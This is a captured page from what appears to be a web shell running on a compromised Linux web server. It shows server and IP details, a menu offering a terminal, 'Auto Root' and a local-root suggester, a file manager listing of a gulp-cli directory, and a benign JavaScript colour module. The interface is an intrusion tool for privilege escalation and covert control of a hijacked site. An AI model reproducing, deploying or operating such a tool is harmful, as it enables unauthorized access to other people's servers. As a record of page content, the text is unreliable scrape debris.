Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 216.73.216.183
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
gulp-cli /
lib /
shared /
Delete
Unzip
Name
Size
Permission
Date
Action
config
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
log
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
ansi.js
929
B
-rw-rw-r--
2022-08-30 11:49
cli-options.js
3.36
KB
-rw-rw-r--
2022-08-30 11:49
completion.js
486
B
-rw-rw-r--
2022-08-30 11:49
exit.js
313
B
-rw-rw-r--
2022-08-30 11:49
get-blacklist.js
1.15
KB
-rw-rw-r--
2022-08-30 11:49
make-title.js
174
B
-rw-rw-r--
2022-08-30 11:49
register-exports.js
382
B
-rw-rw-r--
2022-08-30 11:49
require-or-import.js
981
B
-rw-rw-r--
2022-08-30 11:49
tildify.js
163
B
-rw-rw-r--
2022-08-30 11:49
verify-dependencies.js
716
B
-rw-rw-r--
2022-08-30 11:49
Save
Rename
'use strict'; var colors = require('ansi-colors'); var supportsColor = require('color-support'); var hasColors = colorize(); /* istanbul ignore next */ module.exports = { red: hasColors ? colors.red : noColor, green: hasColors ? colors.green : noColor, blue: hasColors ? colors.blue : noColor, magenta: hasColors ? colors.magenta : noColor, cyan: hasColors ? colors.cyan : noColor, white: hasColors ? colors.white : noColor, gray: hasColors ? colors.gray : noColor, bgred: hasColors ? colors.bgred : noColor, bold: hasColors ? colors.bold : noColor, yellow: hasColors ? colors.yellow : noColor, }; function noColor(message) { return message; } function hasFlag(flag) { return (process.argv.indexOf('--' + flag) !== -1); } function colorize() { if (hasFlag('no-color')) { return false; } /* istanbul ignore if */ if (hasFlag('color')) { return true; } return supportsColor(); }